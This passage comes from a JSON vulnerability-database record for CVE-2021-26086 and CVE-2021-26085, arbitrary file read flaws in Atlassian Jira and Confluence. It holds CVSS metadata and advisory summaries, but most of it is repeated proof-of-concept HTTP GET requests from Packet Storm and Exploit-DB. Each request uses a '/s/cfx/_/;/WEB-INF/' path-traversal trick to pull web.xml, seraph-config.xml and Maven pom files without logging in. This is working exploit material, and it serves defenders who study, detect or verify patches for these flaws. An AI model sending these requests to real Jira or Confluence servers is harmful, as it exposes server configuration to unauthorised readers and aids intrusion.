\n# Software Link: https://www.atlassian.com/software/jira/download/data-center \n# Version: versions < 8.5.14, 8.6.0 \u2264 version < 8.13.6, 8.14.0 \u2264 version < 8.16.1 \n# Tested on: Kali Linux & 
Windows 10 \n# CVE : CVE-2021-26086 \n \nPOC File #1 - web.xml \n \nGET /s/cfx/_/;/WEB-INF/web.xml HTTP/1.1 \nHost: 127.0.0.1:8080 \nUpgrade-Insecure-Requests: 1 \nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 \nAccept-Encoding: gzip, deflate \nAccept-Language: en-US,en;q=0.9 \nConnection: close \n \n \nPOC File #2 - seraph-config.xml \n \nGET /s/cfx/_/;/WEB-INF/classes/seraph-config.xml HTTP/1.1 \nHost: 127.0.0.1:8080 \nUpgrade-Insecure-Requests: 1 \nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 \nAccept-Encoding: gzip, deflate \nAccept-Language: en-US,en;q=0.9 \nConnection: close \n \nPOC File #3 - decorators.xml \n \nGET /s/cfx/_/;/WEB-INF/decorators.xml HTTP/1.1 \nHost: 127.0.0.1:8080 \nUpgrade-Insecure-Requests: 1 \nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 \nAccept-Encoding: gzip, deflate \nAccept-Language: en-US,en;q=0.9 \nConnection: close \n \n \nPOC File #4 - /jira-webapp-dist/pom.properties \n \nGET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1 \nHost: 127.0.0.1:8080 \nUpgrade-Insecure-Requests: 1 \nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 \nAccept: 
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 \nAccept-Encoding: gzip, deflate \nAccept-Language: en-US,en;q=0.9 \nConnection: close \n \nPOC File #5 - /jira-webapp-dist/pom.xml \n \nGET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml HTTP/1.1 \nHost: 127.0.0.1:8080 \nUpgrade-Insecure-Requests: 1 \nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 \nAccept-Encoding: gzip, deflate \nAccept-Language: en-US,en;q=0.9 \nConnection: close \n \nPOC File #6 - /atlassian-jira-webapp/pom.xml \n \nGET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1 \nHost: 127.0.0.1:8080 \nUpgrade-Insecure-Requests: 1 \nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 \nAccept-Encoding: gzip, deflate \nAccept-Language: en-US,en;q=0.9 \nConnection: close \n \nPOC File #7 - /atlassian-jira-webapp/pom.properties \n \nGET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties HTTP/1.1 \nHost: 127.0.0.1:8080 \nUpgrade-Insecure-Requests: 1 \nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 \nAccept-Encoding: gzip, deflate \nAccept-Language: en-US,en;q=0.9 \nConnection: close \n \n \n`\n", "sourceHref": 
"https://packetstormsecurity.com/files/download/164405/ajsdc840-fileread.txt", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-10-05T15:03:36", "description": "", "cvss3": {}, "published": "2021-10-05T00:00:00", "type": "packetstorm", "title": "Atlassian Confluence Server 7.5.1 Arbitrary File Read", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-26085"], "modified": "2021-10-05T00:00:00", "id": "PACKETSTORM:164401", "href": "https://packetstormsecurity.com/files/164401/Atlassian-Confluence-Server-7.5.1-Arbitrary-File-Read.html", "sourceData": "`# Exploit Title: Atlassian Confluence Server 7.5.1 Pre-Authorization Arbitrary File Read vulnerability \n# Date: 2021-10-05 \n# Exploit Author: Mayank Deshmukh \n# Author email: coldfusionx@outlook.com \n# Vendor Homepage: https://www.atlassian.com/ \n# Software Link: https://www.atlassian.com/software/confluence/download-archives \n# Version: All < 7.5.0 versions before 7.12.3 \n# Tested on: Kali Linux & Windows 10 \n# CVE : CVE-2021-26085 \n \nPOC #1 - web.xml \n \nGET /s/123cfx/_/;/WEB-INF/web.xml HTTP/1.1 \nHost: 127.0.0.1:8090 \nCache-Control: max-age=0 \nUpgrade-Insecure-Requests: 1 \nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 \nAccept-Encoding: gzip, deflate \nAccept-Language: en-US,en;q=0.9 \nConnection: close \n \nPOC #2 - seraph-config.xml \n \nGET /s/123cfx/_/;/WEB-INF/classes/seraph-config.xml HTTP/1.1 \nHost: 127.0.0.1:8090 \nCache-Control: max-age=0 \nUpgrade-Insecure-Requests: 1 \nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 \nAccept: 
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 \nAccept-Encoding: gzip, deflate \nAccept-Language: en-US,en;q=0.9 \nConnection: close \n \nPOC #3 - pom.properties \n \nGET /s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.properties HTTP/1.1 \nHost: 127.0.0.1:8090 \nCache-Control: max-age=0 \nUpgrade-Insecure-Requests: 1 \nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 \nAccept-Encoding: gzip, deflate \nAccept-Language: en-US,en;q=0.9 \nConnection: close \n \nPOC #4 - pom.xml \n \nGET /s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.xml HTTP/1.1 \nHost: 127.0.0.1:8090 \nCache-Control: max-age=0 \nUpgrade-Insecure-Requests: 1 \nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 \nAccept-Encoding: gzip, deflate \nAccept-Language: en-US,en;q=0.9 \nConnection: close \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/164401/acs751-fileread.txt", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "attackerkb": [{"lastseen": "2022-04-28T02:33:37", "description": "Affected versions of Atlassian Confluence Server allow remote attackers to view restricted resources via a Pre-Authorization Arbitrary File Read vulnerability in the /s/ endpoint. 
The affected versions are before version 7.4.10, and from version 7.5.0 before 7.12.3.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2021-07-29T00:00:00", "type": "attackerkb", "title": "CVE-2021-26085", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26085"], "modified": "2021-08-12T00:00:00", "id": "AKB:86E277EE-5AAD-4CB9-B3E0-74F63338074C", "href": "https://attackerkb.com/topics/mZkkGESb1c/cve-2021-26085", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "dsquare": [{"lastseen": "2021-11-26T18:37:32", "description": "File disclosure vulnerability in Confluence\n\nVulnerability Type: File Disclosure", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", 
"userInteraction": "NONE", "version": "3.1"}, "impactScore": 1.4}, "published": "2021-09-07T00:00:00", "type": "dsquare", "title": "Confluence < 7.12.3 File Disclosure", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26085"], "modified": "2021-09-07T00:00:00", "id": "E-737", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "checkpoint_advisories": [{"lastseen": "2022-06-22T16:54:07", "description": "An arbitrary file read vulnerability exists in Atlassian Confluence Server. 
Successful exploitation of this vulnerability could allow an unauthenticated remote attacker to access and read arbitrary files.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2022-02-06T00:00:00", "type": "checkpoint_advisories", "title": "Atlassian Confluence Server Arbitrary File Read (CVE-2021-26085)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26085"], "modified": "2022-06-22T00:00:00", "id": "CPAI-2021-1063", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "exploitdb": [{"lastseen": "2022-01-13T05:28:23", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 1.4}, "published": "2021-10-06T00:00:00", "type": "exploitdb", "title": "Atlassian Jira Server Data Center 8.16.0 - Arbitrary File 
Read", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26086", "2021-26086"], "modified": "2021-10-06T00:00:00", "id": "EDB-ID:50380", "href": "https://www.exploit-db.com/exploits/50380", "sourceData": "# Exploit Title: Atlassian Jira Server Data Center 8.16.0 - Arbitrary File Read\r\n# Date: 2021-10-05\r\n# Exploit Author: Mayank Deshmukh\r\n# Vendor Homepage: https://www.atlassian.com/\r\n# Software Link: https://www.atlassian.com/software/jira/download/data-center\r\n# Version: versions < 8.5.14, 8.6.0 \u2264 version < 8.13.6, 8.14.0 \u2264 version < 8.16.1\r\n# Tested on: Kali Linux & Windows 10\r\n# CVE : CVE-2021-26086\r\n\r\nPOC File #1 - web.xml\r\n\r\nGET /s/cfx/_/;/WEB-INF/web.xml HTTP/1.1\r\nHost: 127.0.0.1:8080\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\nConnection: close\r\n\r\n\r\nPOC File #2 - seraph-config.xml\r\n\r\nGET /s/cfx/_/;/WEB-INF/classes/seraph-config.xml HTTP/1.1\r\nHost: 127.0.0.1:8080\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36\r\nAccept: 
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\nConnection: close\r\n\r\nPOC File #3 - decorators.xml\r\n\r\nGET /s/cfx/_/;/WEB-INF/decorators.xml HTTP/1.1\r\nHost: 127.0.0.1:8080\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\nConnection: close\r\n\r\n\r\nPOC File #4 - /jira-webapp-dist/pom.properties\r\n\r\nGET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1\r\nHost: 127.0.0.1:8080\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\nConnection: close\r\n\r\nPOC File #5 - /jira-webapp-dist/pom.xml\r\n\r\nGET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml HTTP/1.1\r\nHost: 127.0.0.1:8080\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\nConnection: close\r\n\r\nPOC File #6 - /atlassian-jira-webapp/pom.xml\r\n\r\nGET 
/s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1\r\nHost: 127.0.0.1:8080\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\nConnection: close\r\n\r\nPOC File #7 - /atlassian-jira-webapp/pom.properties\r\n\r\nGET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties HTTP/1.1\r\nHost: 127.0.0.1:8080\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\nConnection: close", "sourceHref": "https://www.exploit-db.com/download/50380", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-01-13T05:28:23", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2021-10-05T00:00:00", "type": "exploitdb", "title": "Atlassian Confluence 7.12.2 - Pre-Authorization Arbitrary File Read", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26085", "2021-26085"], "modified": "2021-10-05T00:00:00", "id": "EDB-ID:50377", "href": "https://www.exploit-db.com/exploits/50377", "sourceData": "# Exploit Title: Atlassian Confluence 7.12.2 - Pre-Authorization Arbitrary File Read\r\n# Date: 2021-10-05\r\n# Exploit Author: Mayank Deshmukh\r\n# Vendor Homepage: https://www.atlassian.com/\r\n# Software Link: https://www.atlassian.com/software/confluence/download-archives\r\n# Version: version < 7.4.10 and 7.5.0 \u2264 version < 7.12.3\r\n# Tested on: Kali Linux & Windows 10\r\n# CVE : CVE-2021-26085\r\n\r\nPOC #1 - web.xml\r\n\r\nGET /s/123cfx/_/;/WEB-INF/web.xml HTTP/1.1\r\nHost: 127.0.0.1:8090\r\nCache-Control: max-age=0\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\nConnection: close\r\n\r\nPOC #2 - seraph-config.xml\r\n\r\nGET /s/123cfx/_/;/WEB-INF/classes/seraph-config.xml HTTP/1.1\r\nHost: 127.0.0.1:8090\r\nCache-Control: max-age=0\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: 
en-US,en;q=0.9\r\nConnection: close\r\n\r\nPOC #3 - pom.properties\r\n\r\nGET /s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.properties HTTP/1.1\r\nHost: 127.0.0.1:8090\r\nCache-Control: max-age=0\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\nConnection: close\r\n\r\nPOC #4 - pom.xml\r\n\r\nGET /s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.xml HTTP/1.1\r\nHost: 127.0.0.1:8090\r\nCache-Control: max-age=0\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\nConnection: close", "sourceHref": "https://www.exploit-db.com/download/50377", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}]}